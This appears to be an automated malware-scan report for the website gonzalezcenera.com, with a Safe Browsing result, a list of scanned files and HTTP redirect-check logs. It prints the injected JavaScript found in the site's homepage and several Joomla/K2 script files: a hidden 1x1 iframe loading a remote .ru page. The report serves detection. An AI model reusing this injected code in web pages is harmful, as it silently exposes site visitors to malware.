Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gonzalezcenera.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gonzalezcenera.com/ | 200 OK Content-Length: 6128 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var clad = document.createElement('iframe'); clad.src = 'http://haqegwaq.ru/count30.php'; clad.style.position = 'absolute'; clad.style.border = '0'; clad.style.height = '1px'; clad.style.width = '1px'; clad.style.left = '1px'; clad.style.top = '1px'; if (!document.getElementById('clad')) { document.write('<div id=\'clad\'></div>'); document.getElementById('clad').appendChild(clad); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); v Antivirus reports:
| ||
http://gonzalezcenera.com/media/system/js/modal.js | 200 OK Content-Length: 19348 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() {
var rul = document.createElement('iframe');
rul.src = 'http://haqegwaq.ru/count30.php';
rul.style.position = 'absolute';
rul.style.border = '0';
rul.style.height = '1px';
rul.style.width = '1px';
rul.style.left = '1px';
rul.style.top = '1px';
if (!document.getElementById('rul')) {
document.write('<div id=\'rul\'></div>');
document.getElementById('rul').appendChild(rul);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date Antivirus reports:
| ||
http://gonzalezcenera.com//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/ | 404 Not Found Content-Length: 361 Content-Type: text/html | clean |
http://gonzalezcenera.com/test404page.js | 404 Not Found Content-Length: 320 Content-Type: text/html | clean |
http://gonzalezcenera.com/components/com_k2/js/k2.js | 200 OK Content-Length: 15580 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() {
var rul = document.createElement('iframe');
rul.src = 'http://haqegwaq.ru/count30.php';
rul.style.position = 'absolute';
rul.style.border = '0';
rul.style.height = '1px';
rul.style.width = '1px';
rul.style.left = '1px';
rul.style.top = '1px';
if (!document.getElementById('rul')) {
document.write('<div id=\'rul\'></div>');
document.getElementById('rul').appendChild(rul);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date Antivirus reports:
| ||
http://gonzalezcenera.com/components/com_k2store/js/k2store-mt1.2.js | 200 OK Content-Length: 16393 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() {
var rul = document.createElement('iframe');
rul.src = 'http://haqegwaq.ru/count30.php';
rul.style.position = 'absolute';
rul.style.border = '0';
rul.style.height = '1px';
rul.style.width = '1px';
rul.style.left = '1px';
rul.style.top = '1px';
if (!document.getElementById('rul')) {
document.write('<div id=\'rul\'></div>');
document.getElementById('rul').appendChild(rul);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date Antivirus reports:
| ||
http://gonzalezcenera.com/media/system/js/caption.js | 200 OK Content-Length: 10723 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() {
var rul = document.createElement('iframe');
rul.src = 'http://haqegwaq.ru/count30.php';
rul.style.position = 'absolute';
rul.style.border = '0';
rul.style.height = '1px';
rul.style.width = '1px';
rul.style.left = '1px';
rul.style.top = '1px';
if (!document.getElementById('rul')) {
document.write('<div id=\'rul\'></div>');
document.getElementById('rul').appendChild(rul);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gonzalezcenera.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 11 Jan 2015 14:55:33 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 11 Jan 2015 14:55:33 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2cc1fccc098d7d0d966729a2d432177a=29ddd6c8b3c0683ccedcdef11cce2828; path=/
X-Powered-By: PHP/5.2.17
X-Proxy-Cache: MISS
GET / HTTP/1.1
Host: gonzalezcenera.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 11 Jan 2015 14:55:33 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 11 Jan 2015 14:55:33 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2cc1fccc098d7d0d966729a2d432177a=29ddd6c8b3c0683ccedcdef11cce2828; path=/
X-Powered-By: PHP/5.2.17
X-Proxy-Cache: MISS
Second query (visit from search engine):
GET / HTTP/1.1
Host: gonzalezcenera.com
Referer: http://www.google.com/search?q=gonzalezcenera.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gonzalezcenera.com
Referer: http://www.google.com/search?q=gonzalezcenera.com
Result:
The result is similar to the first query. There are no suspicious redirects found.